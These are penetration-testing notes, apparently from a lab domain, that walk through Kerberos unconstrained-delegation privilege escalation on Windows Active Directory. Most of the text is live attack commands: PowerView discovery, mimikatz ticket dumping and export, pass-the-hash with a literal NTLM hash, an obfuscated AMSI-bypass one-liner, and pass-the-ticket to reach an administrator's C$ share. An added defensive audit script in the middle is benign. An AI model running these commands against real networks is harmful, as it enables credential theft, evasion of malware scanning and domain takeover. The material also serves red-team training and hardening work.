Privesc: Kerberos (unconstrained delegation)

Discover domain computers that have unconstrained delegation enabled, using PowerView:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained

Using the Active Directory module (this one lists user accounts trusted for delegation):

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true}
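As an added audit script (not part of the original notes), the following generalizes the two discovery commands above into the check a defender would run: it lists computers and users with unconstrained delegation, flags non-DC computers as findings, and lists Domain Admins whose TGT could be captured on such a host because they are neither marked "Account is sensitive and cannot be delegated" nor in Protected Users. It assumes the RSAT ActiveDirectory module and a domain-authenticated session.

```powershell
# Added audit script, not from the original notes. Assumes RSAT ActiveDirectory module
# and a domain-joined session with rights to read AD.
Import-Module ActiveDirectory

# Unconstrained delegation is the TRUSTED_FOR_DELEGATION bit (0x80000) in userAccountControl.
# Domain controllers legitimately carry it; anything else is a finding.
$dcs = (Get-ADDomainController -Filter *).Name

# 1. Computers with unconstrained delegation; Expected = $false means a non-DC host.
Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation, OperatingSystem |
    ForEach-Object {
        [pscustomobject]@{
            Name     = $_.Name
            OS       = $_.OperatingSystem
            Expected = ($dcs -contains $_.Name)
        }
    } | Sort-Object Expected | Format-Table -AutoSize

# 2. User accounts with unconstrained delegation (typically service accounts with SPNs).
Get-ADUser -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation, ServicePrincipalName |
    Select-Object SamAccountName, Enabled, @{ n = 'SPNs'; e = { $_.ServicePrincipalName -join ';' } } |
    Format-Table -AutoSize

# 3. Privileged accounts exposed to TGT capture on an unconstrained host: Domain Admins
#    without AccountNotDelegated and not in Protected Users (group exists on 2012 R2+ domains).
$protected = (Get-ADGroupMember 'Protected Users' -Recursive -ErrorAction SilentlyContinue).SamAccountName
Get-ADGroupMember 'Domain Admins' -Recursive |
    Where-Object objectClass -eq 'user' |
    Get-ADUser -Properties AccountNotDelegated |
    Where-Object { -not $_.AccountNotDelegated -and ($protected -notcontains $_.SamAccountName) } |
    Select-Object SamAccountName, AccountNotDelegated |
    Format-Table -AutoSize

# Remediation for accounts reported in step 3:
#   Set-ADAccountControl -Identity <SamAccountName> -AccountNotDelegated $true
# and, where feasible, membership in Protected Users; for hosts in step 1, move them to
# constrained or resource-based delegation instead.
```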

On such a computer, run the following to check whether any DA token is available:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::tickets"'

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:security.local /ntlm:638edc584b4d0a93fe3701b66d2f525b /run:powershell.exe"'

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> sET-ItEM ( ‘v’+’aR’ + ‘IA’ + ‘blE:1q2’ + ‘uZx’  ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( GeT-VariaBle ( “1Q2U” +”zX” ) -VaL ).”A’ss’Emb1y”.”GET’TY’Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f’Util’,’A’,’Amsi’,’.Management.’,’utomation.’,’s’,’System’ )).”g’etf’iElD”( (“{0}{2}{1}” -f’amsi’,’d’,’InitFaile’ ),( “{2}{4}{0}{1}{3} -f ‘Stat’,’i’,’NonPubli’,’c’,’c,’ )).”sE’T’ VaLUE”(${n’ULl},${t’RuE} )

mimikatz # privilege::debug

mimikatz # sekurlsa::tickets /export

PS C:\Users\victim3\Downloads\tool\tool\mimikatz_trunk (1)> cd .\x64\

PS C:\Users\victim3\Downloads\tool\tool\mimikatz_trunk (1)\x64> dir

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-UserHunter -ComputerName WIN-2RUMVG5JPOC -UserName administrator -Delay 5 -Verbose

PS C:\Users\victim3\Downloads\tool\tool> cd .\NetCease\

PS C:\Users\victim3\Downloads\tool\tool\NetCease> .\NetCease.ps1

PS C:\Users\victim3\Downloads\tool\tool\NetCease> ls \\WIN-2RUMVG5JPOC.security.local\c$

mimikatz # sekurlsa::kerberos

Remove all previously exported ticket files (.kirbi):

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> rm -force *.kirbi

Export the tickets again:

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> invoke-mimikatz -command '"sekurlsa::tickets /export"'

We get the list of all the exported tickets:

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> ls | select name

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

PS C:\Users\victim3\Downloads\tool\tool\NetCease> Invoke-mimikatz -command '"kerberos::ptt [0;39f28c6]-2-0-60a1000-administrator@WIN-2RUMVG5JPOC.security.local.kirbi"'

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> ls \\WIN-2RUMVG5JPOC.security.local\c$

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

@Saksham Dixit